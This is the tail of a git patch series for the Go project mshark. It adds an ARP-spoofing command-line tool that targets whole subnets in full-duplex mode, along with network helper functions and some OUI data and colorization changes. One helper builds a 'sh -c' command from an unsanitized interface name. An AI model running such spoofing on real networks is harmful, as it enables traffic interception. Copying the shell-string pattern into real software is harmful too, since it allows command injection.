`\b(?:\d{1,3}\.){3}\d{1,3}(?::(6553[0-5]|655[0-2]\d|65[0-4]\d{2}|6[0-4]\d{3}|[1-5]?\d{1,4}))?\b`, + ) +) + +func root(args []string) error { + conf := &arpspoof.ARPSpoofConfig{} + flags := flag.NewFlagSet(app, flag.ExitOnError) + flags.StringVar( + &conf.Targets, + "t", + "", + "Targets for ARP spoofing. Example: \"targets 10.0.0.1,10.0.0.5-10,192.168.1.*,192.168.10.0/24\" (Default: entire subnet)", + ) + gw := flags.String("g", "", "IPv4 address of custom gateway (Default: default gateway)") + flags.StringVar(&conf.Interface, "i", "", "The name of the network interface. Example: eth0 (Default: default interface)") + flags.BoolVar(&conf.FullDuplex, "f", false, "Run ARP spoofing in fullduplex mode") + flags.BoolVar(&conf.Debug, "d", false, "Enable debug logging") + flags.BoolFunc("I", "Display list of interfaces and exit.", func(flagValue string) error { + if err := network.DisplayInterfaces(); err != nil { + fmt.Fprintf(os.Stderr, "%s: %v\n", app, err) + os.Exit(2) + } + os.Exit(0) + return nil + }) + if err := flags.Parse(args); err != nil { + return err + } + if *gw != "" { + ip, err := netip.ParseAddr(*gw) + if err != nil { + return err + } + conf.Gateway = &ip + } + output := zerolog.ConsoleWriter{Out: os.Stdout, NoColor: false} + output.FormatTimestamp = func(i any) string { + ts, _ := time.Parse(time.RFC3339, i.(string)) + return colors.Gray(colors.WrapBrackets(ts.Format(time.TimeOnly))).String() + } + output.FormatMessage = func(i any) string { + if i == nil || i == "" { + return "" + } + s := i.(string) + result := ipPortPattern.ReplaceAllStringFunc(s, func(match string) string { + return colors.Gray(match).String() + }) + return result + } + logger := zerolog.New(output).With().Timestamp().Logger() + conf.Logger = &logger + arpspoofer, err := arpspoof.NewARPSpoofer(conf) + if err != nil { + return err + } + go arpspoofer.Start() + quit := make(chan os.Signal, 1) + signal.Notify(quit, os.Interrupt) + <-quit + return arpspoofer.Stop() +} + +func main() { + if err := root(os.Args[1:]); err != nil { + fmt.Fprintf(os.Stderr, "%s: %v\n", app, err) + os.Exit(2) + } +} diff --git a/cmd/mshark/cli.go b/cmd/mshark/cli.go index c96d0b7..6c96c21 100644 --- a/cmd/mshark/cli.go +++ b/cmd/mshark/cli.go @@ -3,17 +3,16 @@ package main import ( "flag" "fmt" - "net" "os" "path/filepath" "slices" "strings" - "text/tabwriter" "time" ms "github.com/shadowy-pycoder/mshark" "github.com/shadowy-pycoder/mshark/mpcap" "github.com/shadowy-pycoder/mshark/mpcapng" + "github.com/shadowy-pycoder/mshark/network" ) const app string = "mshark" @@ -62,21 +61,6 @@ func (f *ExtFlag) UnmarshalText(b []byte) error { return nil } -func displayInterfaces() error { - w := new(tabwriter.Writer) - w.Init(os.Stdout, 0, 0, 2, ' ', tabwriter.TabIndent) - ifaces, err := net.Interfaces() - if err != nil { - return fmt.Errorf("failed to get network interfaces: %v", err) - } - fmt.Fprintln(w, "Index\tName\tFlags") - fmt.Fprintln(w, "0\tany\tUP") - for _, iface := range ifaces { - fmt.Fprintf(w, "%d\t%s\t%s\n", iface.Index, iface.Name, strings.ToUpper(iface.Flags.String())) - } - return w.Flush() -} - func createFile(app, ext string) (*os.File, error) { path := fmt.Sprintf("./%s_%s.%s", app, time.Now().UTC().Format("20060102_150405"), ext) f, err := os.OpenFile(filepath.FromSlash(path), os.O_CREATE|os.O_WRONLY, 0o644) @@ -105,7 +89,7 @@ func root(args []string) error { packetBuffer := flags.Int("b", 8192, "The maximum size of packet queue.") flags.StringVar(&conf.Expr, "e", "", `BPF filter expression. Example: "ip proto tcp".`) flags.BoolFunc("D", "Display list of interfaces and exit.", func(flagValue string) error { - if err := displayInterfaces(); err != nil { + if err := network.DisplayInterfaces(); err != nil { fmt.Fprintf(os.Stderr, "%s: %v\n", app, err) os.Exit(2) } @@ -130,7 +114,7 @@ func root(args []string) error { } // getting network interface from the provided name - in, err := ms.InterfaceByName(*iface) + in, err := network.InterfaceByName(*iface) if err != nil { return err } diff --git a/go.mod b/go.mod index 7655c55..1ef296e 100644 --- a/go.mod +++ b/go.mod @@ -4,8 +4,11 @@ go 1.24.1 require ( github.com/magefile/mage v1.15.0 + github.com/malfunkt/iprange v0.9.0 github.com/mdlayher/packet v1.1.2 github.com/packetcap/go-pcap v0.0.0-20240528124601-8c87ecf5dbc5 + github.com/rs/zerolog v1.34.0 + github.com/shadowy-pycoder/colors v0.0.1 github.com/stretchr/testify v1.9.0 golang.org/x/net v0.28.0 golang.org/x/text v0.27.0 @@ -14,7 +17,10 @@ require ( require ( github.com/davecgh/go-spew v1.1.1 // indirect github.com/josharian/native v1.1.0 // indirect + github.com/mattn/go-colorable v0.1.13 // indirect + github.com/mattn/go-isatty v0.0.19 // indirect github.com/mdlayher/socket v0.4.1 // indirect + github.com/pkg/errors v0.9.1 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect golang.org/x/sync v0.16.0 // indirect golang.org/x/sys v0.24.0 // indirect diff --git a/go.sum b/go.sum index 73bf9ea..e2a4ae6 100644 --- a/go.sum +++ b/go.sum @@ -1,5 +1,7 @@ +github.com/coreos/go-systemd/v22 v22.5.0/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc= github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= github.com/google/go-cmp v0.5.9 h1:O2Tfq5qg4qc4AmwVlvv0oLiVAGB7enBSJ2x2DqQFi38= github.com/google/go-cmp v0.5.9/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= github.com/gopacket/gopacket v1.2.0 h1:eXbzFad7f73P1n2EJHQlsKuvIMJjVXK5tXoSca78I3A= @@ -8,20 +10,37 @@ github.com/josharian/native v1.1.0 h1:uuaP0hAbW7Y4l0ZRQ6C9zfb7Mg1mbFKry/xzDAfmtL github.com/josharian/native v1.1.0/go.mod h1:7X/raswPFr05uY3HiLlYeyQntB6OO7E/d2Cu7qoaN2w= github.com/magefile/mage v1.15.0 h1:BvGheCMAsG3bWUDbZ8AyXXpCNwU9u5CB6sM+HNb9HYg= github.com/magefile/mage v1.15.0/go.mod h1:z5UZb/iS3GoOSn0JgWuiw7dxlurVYTu+/jHXqQg881A= +github.com/malfunkt/iprange v0.9.0 h1:VCs0PKLUPotNVQTpVNszsut4lP7OCGNBwX+lOYBrnVQ= +github.com/malfunkt/iprange v0.9.0/go.mod h1:TRGqO/f95gh3LOndUGTL46+W0GXA91WTqyZ0Quwvt4U= +github.com/mattn/go-colorable v0.1.13 h1:fFA4WZxdEF4tXPZVKMLwD8oUnCTTo08duU7wxecdEvA= +github.com/mattn/go-colorable v0.1.13/go.mod h1:7S9/ev0klgBDR4GtXTXX8a3vIGJpMovkB8vQcUbaXHg= +github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM= +github.com/mattn/go-isatty v0.0.19 h1:JITubQf0MOLdlGRuRq+jtsDlekdYPia9ZFsB8h/APPA= +github.com/mattn/go-isatty v0.0.19/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= github.com/mdlayher/packet v1.1.2 h1:3Up1NG6LZrsgDVn6X4L9Ge/iyRyxFEFD9o6Pr3Q1nQY= github.com/mdlayher/packet v1.1.2/go.mod h1:GEu1+n9sG5VtiRE4SydOmX5GTwyyYlteZiFU+x0kew4= github.com/mdlayher/socket v0.4.1 h1:eM9y2/jlbs1M615oshPQOHZzj6R6wMT7bX5NPiQvn2U= github.com/mdlayher/socket v0.4.1/go.mod h1:cAqeGjoufqdxWkD7DkpyS+wcefOtmu5OQ8KuoJGIReA= github.com/packetcap/go-pcap v0.0.0-20240528124601-8c87ecf5dbc5 h1:p4VuaitqUAqSZSomd7Wb4BPV/Jj7Hno2/iqtfX7DZJI= github.com/packetcap/go-pcap v0.0.0-20240528124601-8c87ecf5dbc5/go.mod h1:zIAoVKeWP0mz4zXY50UYQt6NLg2uwKRswMDcGEqOms4= +github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4= +github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/rs/xid v1.6.0/go.mod h1:7XoLgs4eV+QndskICGsho+ADou8ySMSjJKDIan90Nz0= +github.com/rs/zerolog v1.34.0 h1:k43nTLIwcTVQAncfCw4KZ2VY6ukYoZaBPNOE8txlOeY= +github.com/rs/zerolog v1.34.0/go.mod h1:bJsvje4Z08ROH4Nhs5iH600c3IkWhwp44iRc54W6wYQ= +github.com/shadowy-pycoder/colors v0.0.1 h1:weCj/YIOupqy4BSP8KuVzr20fC+cuAv/tArz7bhhkP4= +github.com/shadowy-pycoder/colors v0.0.1/go.mod h1:lkrJS1PY2oVigNLTT6pkbF7B/v0YcU2LD5PZnss1Q4U= github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg= github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= golang.org/x/net v0.28.0 h1:a9JDOJc5GMUJ0+UDqmLT86WiEy7iWyIhz8gz8E4e5hE= golang.org/x/net v0.28.0/go.mod h1:yqtgsTWOOnlGLG9GFRrK3++bGOUEkNBoHZc8MEDWPNg= golang.org/x/sync v0.16.0 h1:ycBJEhp9p4vXvUZNszeOq0kGTPghopOL8q0fq3vstxw= golang.org/x/sync v0.16.0/go.mod h1:1dzgHSNfp02xaA81J2MS99Qcpr2w7fw1gpm99rleRqA= +golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.12.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.24.0 h1:Twjiwq9dn6R1fQcyiK+wQyHWfaz/BJB+YIpzU/Cv3Xg= golang.org/x/sys v0.24.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= golang.org/x/text v0.27.0 h1:4fGWRpyh641NLlecmyl4LOe6yDdfaYNrGb2zdfo4JV4= diff --git a/mshark.go b/mshark.go index 1f4ecd7..650e7bc 100644 --- a/mshark.go +++ b/mshark.go @@ -140,31 +140,6 @@ func (mw *Writer) WriteHeader(c *Config) error { return err } -// InterfaceByName returns the interface specified by name. -func InterfaceByName(name string) (*net.Interface, error) { - var ( - in *net.Interface - err error - ) - if name == "any" { - in = &net.Interface{Index: 0, Name: "any"} - } else { - in, err = net.InterfaceByName(name) - if err != nil { - return nil, fmt.Errorf("unknown interface %s: %v", name, err) - } - ok := true && - // Look for an Ethernet interface. - len(in.HardwareAddr) == 6 && - // Look for up, multicast, broadcast. - in.Flags&(net.FlagUp|net.FlagMulticast|net.FlagBroadcast) != 0 - if !ok { - return nil, fmt.Errorf("interface %s is not up", name) - } - } - return in, nil -} - // OpenLive opens a live capture based on the given configuration and writes // all captured packets to the given PacketWriters. func OpenLive(conf *Config, pw ...PacketWriter) error { diff --git a/mshark_test.go b/mshark_test.go index 2873dc7..4e1314d 100644 --- a/mshark_test.go +++ b/mshark_test.go @@ -3,11 +3,13 @@ package mshark import ( "io" "testing" + + "github.com/shadowy-pycoder/mshark/network" ) func BenchmarkOpenLive(b *testing.B) { b.ResetTimer() - in, err := InterfaceByName("any") + in, err := network.InterfaceByName("any") if err != nil { b.Fatal(err) } diff --git a/network/network.go b/network/network.go new file mode 100644 index 0000000..7522e4c --- /dev/null +++ b/network/network.go @@ -0,0 +1,128 @@ +// Package network provides utility functions to extract some data about network +package network + +import ( + "bufio" + "fmt" + "net" + "net/netip" + "os" + "os/exec" + "strings" + "text/tabwriter" +) + +// InterfaceByName returns the interface specified by name. +func InterfaceByName(name string) (*net.Interface, error) { + var ( + in *net.Interface + err error + ) + if name == "any" { + in = &net.Interface{Index: 0, Name: "any"} + } else { + in, err = net.InterfaceByName(name) + if err != nil { + return nil, fmt.Errorf("unknown interface %s: %v", name, err) + } + ok := true && + // Look for an Ethernet interface. + len(in.HardwareAddr) == 6 && + // Look for up, multicast, broadcast. + in.Flags&(net.FlagUp|net.FlagMulticast|net.FlagBroadcast) != 0 + if !ok { + return nil, fmt.Errorf("interface %s is not up", name) + } + } + return in, nil +} + +func DisplayInterfaces() error { + w := new(tabwriter.Writer) + w.Init(os.Stdout, 0, 0, 2, ' ', tabwriter.TabIndent) + ifaces, err := net.Interfaces() + if err != nil { + return fmt.Errorf("failed to get network interfaces: %v", err) + } + fmt.Fprintln(w, "Index\tName\tFlags") + fmt.Fprintln(w, "0\tany\tUP") + for _, iface := range ifaces { + fmt.Fprintf(w, "%d\t%s\t%s\n", iface.Index, iface.Name, strings.ToUpper(iface.Flags.String())) + } + return w.Flush() +} + +func GetDefaultInterface() (*net.Interface, error) { + f, err := os.Open("/proc/net/route") + if err != nil { + return nil, err + } + defer f.Close() + + defaultInterface := "" + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := scanner.Text() + fields := strings.Fields(line) + if len(fields) >= 2 && fields[1] == "00000000" { + defaultInterface = fields[0] + break + } + } + return net.InterfaceByName(defaultInterface) +} + +func GetDefaultGatewayIPv4() (netip.Addr, error) { + cmd := exec.Command("sh", "-c", "ip route show 0.0.0.0/0 | awk '{print $3}'") + ipRaw, err := cmd.Output() + if err != nil { + return netip.Addr{}, err + } + ip, err := netip.ParseAddr(strings.TrimRight(string(ipRaw), "\n")) + if err != nil { + return netip.Addr{}, err + } + if !ip.Is4() { + return netip.Addr{}, fmt.Errorf("only IPv4 is supported") + } + return ip, nil +} + +func GetGatewayIPv4FromInterface(iface string) (netip.Addr, error) { + cmd := exec.Command("sh", "-c", fmt.Sprintf("ip route show dev %s", iface)) + routes, err := cmd.Output() + if err != nil { + return netip.Addr{}, err + } + for line := range strings.Lines(string(routes)) { + fields := strings.Fields(line) + if len(fields) > 2 && fields[1] == "via" { + ip, err := netip.ParseAddr(fields[2]) + if err != nil { + continue + } + if !ip.Is4() { + continue + } + return ip, nil + } + } + return netip.Addr{}, fmt.Errorf("gateway IPv4 not found for %s", iface) +} + +func GetIPv4PrefixFromInterface(iface *net.Interface) (netip.Prefix, error) { + addrs, err := iface.Addrs() + if err != nil { + return netip.Prefix{}, err + } + for _, a := range addrs { + ipPrefix, err := netip.ParsePrefix(a.String()) + if err != nil { + return netip.Prefix{}, err + } + if ipPrefix.Addr().Is4() { + return ipPrefix, nil + } + } + return netip.Prefix{}, fmt.Errorf("no IPv4 prefix found") +} diff --git a/oui/data.go b/oui/data.go index a0105aa..5a3294b 100644 --- a/oui/data.go +++ b/oui/data.go @@ -10819,10 +10819,10 @@ var ouis = map[string]int{ "0050fe": 3595, // PCTVnet ASA "0050ff": 7577, // Hakko Electronics "0051ed": 276, // LG Innotek - "005200": 19244, // PacketPWEthA - "005201": 19251, // PacketPWEthB - "005202": 19247, // BFD for VXLAN - "005213": 19250, // Proxy Mobile IPv6 + "005200": 19250, // PacketPWEthA + "005201": 19244, // PacketPWEthB + "005202": 19246, // BFD for VXLAN + "005213": 19245, // Proxy Mobile IPv6 "005218": 993, // Wuxi Keboda Electron "005245": 11905, // Ganatechwin "0052c2": 624, // peiker acustic @@ -13279,7 +13279,7 @@ var ouis = map[string]int{ "00fd45": 4175, // Hewlett Packard Enterprise "00fd4c": 5546, // Nevatec "00fec8": 4, // Cisco - "01005e": 19249, // IPv4 Multicast + "01005e": 19251, // IPv4 Multicast "020701": 7844, // Racal Datacom "021c7c": 11634, // Perq "026086": 3914, // Logic Replacement Tech @@ -27349,13 +27349,13 @@ var ouis = map[string]int{ "8cfe57": 48, // Apple "8cfe74": 263, // Ruckus Wireless "8cfeb4": 4900, // Vsoontech Electronics - "900000": 19242, // MPLS TP p2p - "900001": 19246, // BFD on LAG Interfaces - "900002": 19248, // AllL1MI ISs - "900003": 19243, // AllL2MI ISs + "900000": 19248, // MPLS TP p2p + "900001": 19247, // BFD on LAG Interfaces + "900002": 19242, // AllL1MI ISs + "900003": 19249, // AllL2MI ISs "90004e": 860, // Hon Hai Precision Ind "9000db": 85, // Samsung Electronics - "900100": 19245, // TRILL OAM + "900100": 19243, // TRILL OAM "900117": 15, // Huawei Technologies "90013b": 3, // Sagemcom Broadband SAS "900218": 309, // Sky Uk @@ -57708,16 +57708,16 @@ var vendors = []string{ "Công ty Cổ phần Thiết bị Công nghiệp GEIC", "Documentation", "IPv6 Multicast", + "AllL1MI ISs", + "TRILL OAM", + "PacketPWEthB", + "Proxy Mobile IPv6", + "BFD for VXLAN", + "BFD on LAG Interfaces", "MPLS TP p2p", "AllL2MI ISs", "PacketPWEthA", - "TRILL OAM", - "BFD on LAG Interfaces", - "BFD for VXLAN", - "AllL1MI ISs", "IPv4 Multicast", - "Proxy Mobile IPv6", - "PacketPWEthB", } var vendorsFull = []string{ @@ -76963,14 +76963,14 @@ var vendorsFull = []string{ "Công ty Cổ phần Thiết bị Công nghiệp GEIC", "Documentation", "IPv6 Multicast", + "AllL1MI ISs", + "TRILL OAM", + "PacketPWEthB", + "Proxy Mobile IPv6", + "BFD for VXLAN", + "BFD on LAG Interfaces", "MPLS TP p2p", "AllL2MI ISs", "PacketPWEthA", - "TRILL OAM", - "BFD on LAG Interfaces", - "BFD for VXLAN", - "AllL1MI ISs", "IPv4 Multicast", - "Proxy Mobile IPv6", - "PacketPWEthB", } diff --git a/oui/oui.go b/oui/oui.go index aacdaeb..58af659 100644 --- a/oui/oui.go +++ b/oui/oui.go @@ -10,7 +10,7 @@ import ( var ( BroadcastMAC = net.HardwareAddr{0xff, 0xff, 0xff, 0xff, 0xff, 0xff} - LocalhostMAC = net.HardwareAddr{0x00, 0x00, 0x00, 0x00, 0x00, 0x00} + LoopbackMAC = net.HardwareAddr{0x00, 0x00, 0x00, 0x00, 0x00, 0x00} ) func outMulticastRange(hw string) bool { @@ -61,8 +61,8 @@ func VendorWithMAC(hw net.HardwareAddr) string { if bytes.Equal(BroadcastMAC, hw) { return "Broadcast_" + hw.String()[9:] } - if bytes.Equal(LocalhostMAC, hw) { - return "Localhost_" + hw.String()[9:] + if bytes.Equal(LoopbackMAC, hw) { + return "Loopback_" + hw.String()[9:] } vendor := Vendor(hw.String(), false) if vendor != "" { From a60306734f4d0f12a41bc3ddb7f57012d3a68979 Mon Sep 17 00:00:00 2001 From: shadowy-pycoder <35629483+shadowy-pycoder@users.noreply.github.com> Date: Mon, 21 Jul 2025 06:21:43 +0300 Subject: [PATCH 3/3] added MAC address colorization and nocolor flag --- arpspoof/arpspoof.go | 2 +- cmd/marpspoof/main.go | 13 ++++++++++++- 2 files changed, 13 insertions(+), 2 deletions(-) diff --git a/arpspoof/arpspoof.go b/arpspoof/arpspoof.go index 10ed79e..659e410 100644 --- a/arpspoof/arpspoof.go +++ b/arpspoof/arpspoof.go @@ -394,7 +394,7 @@ func (ar *ARPSpoofer) spoofTargets() { if err != nil { continue } - ar.logger.Debug().Msgf("[arp spoofer] Sending %d bytes of ARP packet to %s (%s)", len(ap.data), targetIP, oui.VendorWithMAC(targetMAC)) + ar.logger.Debug().Msgf("[arp spoofer] Sending %dB of ARP packet to %s (%s)", len(ap.data), targetIP, oui.VendorWithMAC(targetMAC)) ar.packets <- ap } if ar.fullduplex { diff --git a/cmd/marpspoof/main.go b/cmd/marpspoof/main.go index ec6541e..f0ed072 100644 --- a/cmd/marpspoof/main.go +++ b/cmd/marpspoof/main.go @@ -20,6 +20,7 @@ var ( ipPortPattern = regexp.MustCompile( `\b(?:\d{1,3}\.){3}\d{1,3}(?::(6553[0-5]|655[0-2]\d|65[0-4]\d{2}|6[0-4]\d{3}|[1-5]?\d{1,4}))?\b`, ) + macPattern = regexp.MustCompile(`(?i)([a-z0-9_]+_[0-9a-f]{2}(?::[0-9a-f]{2}){2}|(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})`) ) func root(args []string) error { @@ -35,6 +36,7 @@ func root(args []string) error { flags.StringVar(&conf.Interface, "i", "", "The name of the network interface. Example: eth0 (Default: default interface)") flags.BoolVar(&conf.FullDuplex, "f", false, "Run ARP spoofing in fullduplex mode") flags.BoolVar(&conf.Debug, "d", false, "Enable debug logging") + nocolor := flags.Bool("nocolor", false, "Disable colored output") flags.BoolFunc("I", "Display list of interfaces and exit.", func(flagValue string) error { if err := network.DisplayInterfaces(); err != nil { fmt.Fprintf(os.Stderr, "%s: %v\n", app, err) @@ -53,9 +55,12 @@ func root(args []string) error { } conf.Gateway = &ip } - output := zerolog.ConsoleWriter{Out: os.Stdout, NoColor: false} + output := zerolog.ConsoleWriter{Out: os.Stdout, NoColor: *nocolor} output.FormatTimestamp = func(i any) string { ts, _ := time.Parse(time.RFC3339, i.(string)) + if *nocolor { + return colors.WrapBrackets(ts.Format(time.TimeOnly)) + } return colors.Gray(colors.WrapBrackets(ts.Format(time.TimeOnly))).String() } output.FormatMessage = func(i any) string { @@ -63,9 +68,15 @@ func root(args []string) error { return "" } s := i.(string) + if *nocolor { + return s + } result := ipPortPattern.ReplaceAllStringFunc(s, func(match string) string { return colors.Gray(match).String() }) + result = macPattern.ReplaceAllStringFunc(result, func(match string) string { + return colors.Yellow(match).String() + }) return result } logger := zerolog.New(output).With().Timestamp().Logger()